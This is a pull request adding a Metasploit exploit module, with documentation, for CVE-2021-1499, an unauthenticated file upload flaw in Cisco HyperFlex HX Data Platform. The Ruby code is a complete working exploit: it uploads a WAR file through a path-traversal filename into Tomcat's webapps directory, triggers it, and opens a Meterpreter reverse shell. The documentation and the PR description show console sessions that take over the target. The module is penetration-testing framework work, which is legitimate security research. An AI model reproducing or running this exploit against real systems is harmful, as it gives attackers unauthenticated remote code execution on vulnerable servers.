### PR TITLE
Cisco HyperFlex File Upload RCE

### DIFF
--- a/documentation/modules/exploit/linux/http/cisco_hyperflex_file_upload_rce.md
+++ b/documentation/modules/exploit/linux/http/cisco_hyperflex_file_upload_rce.md
@@ -1,0 +1,82 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an unauthenticated file upload vulnerability in
+Cisco HyperFlex HX Data Platform's /upload endpoint to upload and
+execute a payload as the Tomcat user.
+
+### Setup
+
+Import `Cisco-HX-Data-Platform-Installer-v4.0.2d-35606-esx.ova`.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+### UPLOAD_FILE_NAME
+This is the name of the .jsp file that is packaged inside the .war payload. The .jsp file is auto deployed on the tomcat
+server and is then invoked via a GET request in order to execute the payload. (Random by default).
+
+## Scenarios
+
+### Cisco HyperFlex HX Data Platform Installer 4.0(2d)
+
+```
+msf6 > use exploit/linux/http/cisco_hyperflex_file_upload_rce
+[*] Using configured payload java/meterpreter/reverse_tcp
+msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > options
+
+Module options (exploit/linux/http/cisco_hyperflex_file_upload_rce):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT             80               yes       The target port (TCP)
+   SSL               false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI         /                yes       Base path
+   UPLOAD_FILE_NAME  iQMMhIYPOLAGObK  no        Choose a filename for the payload. (Default is random)
+   VHOST                              no        HTTP server virtual host
+
+
+Payload options (java/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Java Dropper
+
+msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > set rhosts 192.168.123.145
+rhosts => 192.168.123.145
+msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable.
+[*] Preparing payload...
+[*] Uploading payload...
+[+] Payload uploaded successfully
+[*] Executing payload... calling: /crossdomain.xml
+[+] Payload executed successfully
+[*] Sending stage (58082 bytes) to 192.168.123.145
+[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.145:35824) at 2021-06-16 16:33:34 -0400
+[!] This exploit may require manual cleanup of '/var/lib/tomcat7/crossdomain.xml.war' on the target
+[!] This exploit may require manual cleanup of '/var/lib/tomcat7/crossdomain.xml/' on the target
+
+meterpreter > getuid
+Server username: tomcat7
+meterpreter > sysinfo
+
+```

--- a/modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
+++ b/modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
@@ -1,0 +1,166 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco HyperFlex HX Data Platform unauthenticated file upload to RCE (CVE-2021-1499)',
+        'Description' => %q{
+          This module exploits an unauthenticated file upload vulnerability in
+          Cisco HyperFlex HX Data Platform's /upload endpoint to upload and
+          execute a payload as the Tomcat user.
+        },
+        'Author' => [
+          'Nikita Abramov',      # Discovery
+          'Mikhail Klyuchnikov', # Discovery
+          'wvu',                 # Research and guidance
+          'jheysel-r7'           # Metasploit Module
+        ],
+        'References' => [
+          ['CVE', '2021-1499'], # HyperFlex HX File Upload
+          ['URL', 'https://attackerkb.com/assessments/82738621-1114-4aba-990a-9ea007b05834']
+        ],
+        'DisclosureDate' => '2021-05-05',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_X86, ARCH_X64, ARCH_JAVA],
+        'Privileged' => false, # Privesc left as an exercise for the reader
+        'Targets' => [
+          [
+            'Java Dropper',
+            {
+              'Platform' => 'java',
+              'Arch' => ARCH_JAVA,
+              'Version' => Rex::Version.new('2.137'),
+              'Type' => :java_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'java/meterpreter/reverse_tcp',
+                'WfsDelay' => 10
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+                'WfsDelay' => 10
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('UPLOAD_FILE_NAME', [false, 'Choose a filename for the payload. (Default is random)', rand_text_alpha(rand(8..15))])
+    ])
+  end
+
+  def check
+    # The homepage behind SSL indicates whether the endpoint is running Cisco HyperFlex
+    # Installer:         <title>Hyperflex Installer</title>
+    # Installed Product: <title>Cisco HyperFlex Connect</title>
+    # Both the installer and installed product are vulnerable
+    res_ssl = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path),
+      'rport' => 443,
+      'SSL' => true
+    )
+    unless res_ssl && res_ssl.body[%r{<title>(?:Hyperflex Installer|Cisco HyperFlex Connect)</title>}]
+      return Exploit::CheckCode::Safe
+    end
+
+    # The vulnerability, however, lies on the HTTP endpoint /upload.
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'upload')
+    )
+    if res && res.code == 400 && res.body.include?('Apache Tomcat') && res.headers['Server'] && res.headers['Server'].include?('nginx')
+      return Exploit::CheckCode::Appears
+    elsif res && res.code == 404
+      return CheckCode::Safe
+    end
+
+    CheckCode::Unknown
+  end
+
+  def prepare_payload(app_base, jsp_name)
+    print_status('Preparing payload...')
+    war_payload = payload.encoded_war({ app_name: app_base, jsp_name: jsp_name }).to_s
+    fname = app_base + '.war'
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(fname, nil, nil, 'form-data; name="fname"')
+    post_data.add_part('/upload', nil, nil, 'form-data; name="uploadDir"')
+    post_data.add_part(war_payload,
+                       'application/octet-stream', 'binary',
+                       "form-data; name=\"#{jsp_name}\"; filename=\"../../../lib/tomcat7/webapps/#{fname}\"")
+    post_data
+  end
+
+  def upload_payload(post_data)
+    print_status('Uploading payload...')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'upload'),
+      'method' => 'POST',
+      'data' => post_data.to_s,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
+    )
+    if res && res.code == 200 && res.body.to_s =~ /result.*filename:/
+      print_good('Payload uploaded successfully')
+    else
+      fail_with(Failure::UnexpectedReply, 'Payload upload attempt failed')
+    end
+
+    register_file_for_cleanup('/var/lib/tomcat7/crossdomain.xml.war')
+    register_file_for_cleanup('/var/lib/tomcat7/crossdomain.xml/')
+  end
+
+  def execute_payload(url)
+    print_status("Executing payload... calling: #{url}")
+    res = send_request_cgi(
+      'uri' => url,
+      'method' => 'GET'
+    )
+    if res && res.code == 200
+      print_good('Payload executed successfully')
+    else
+      fail_with(Failure::UnexpectedReply, 'Payload execution attempt failed')
+    end
+  end
+
+  def exploit
+    app_base = 'crossdomain.xml'
+    jsp_name = datastore['UPLOAD_FILE_NAME']
+    data = prepare_payload(app_base, jsp_name)
+    upload_payload(data)
+    sleep(datastore['WfsDelay'])
+    if target.name == 'Java Dropper'
+      url = normalize_uri(target_uri.path, app_base.to_s)
+    else
+      url = normalize_uri(target_uri.path, app_base.to_s, "#{jsp_name}.jsp")
+    end
+    execute_payload(url)
+  end
+end


### PR DESCRIPTION
Exploit module to leverage CVE-2021-1499: Unauthenticated file upload vulnerability in Cisco HyperFlex HX Data Platform.

Currently the module is set to use `linux/x64/meterpreter_reverse_tcp` by default. It uploads the war file to `/var/lib/tomcat7/webapps/`, the `.war` file gets auto deployed and then the module manually calls the `.jsp` file inside the deployed war file which sends a meterpreter session back to the user.

## Potential Changes

It came to my attention during development that I'd likely be able to  make use of a `java/meterpreter` payload. I'm going to continue investigating support for this.


## Verification

List the steps needed to make sure this thing works

1. Start `msfconsole`
1. Do `use exploit/linux/http/cisco_hyperflex_file_upload_rce`
1. Set `RHOSTS` and `LHOST` 
1. **Verify** The target appears to be vulnerable (run the check method)
1. Do `run`
1. You should receive a shell, depending on network speed and victim target specifications, you may need to adjust the Wait For Shell Delay as it takes a few seconds to upload, deploy and trigger the payload. WfsDelay is currently set to 5 seconds.

## Demonstration
```
msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > set rhosts 192.168.123.145
rhosts => 192.168.123.145
msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > set lport 4445
lport => 4445
msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > options

Module options (exploit/linux/http/cisco_hyperflex_file_upload_rce):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.123.145  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             80               yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI         /                yes       Base path
   UPLOAD_FILE_NAME  BqGDbpfynLmRaaa  no        Choose a filename for the payload. (Default is random)
   VHOST                              no        HTTP server virtual host


Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.123.1    yes       The listen address (an interface may be specified)
   LPORT  4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux Dropper


msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4445 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload... calling: /crossdomain.xml/BqGDbpfynLmRaaa.jsp
[+] Payload executed successfully
[*] Meterpreter session 1 opened (192.168.123.1:4445 -> 192.168.123.145:52762) at 2021-06-14 17:19:35 -0400

meterpreter > getuid
Server username: tomcat7 @ HyperFlex-Installer-4.0.2d (uid=111, gid=114, euid=111, egid=114)
meterpreter > sysinfo
Computer     : HyperFlex-Installer-4.0.2d
OS           : Ubuntu 16.04 (Linux 4.4.0-75-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```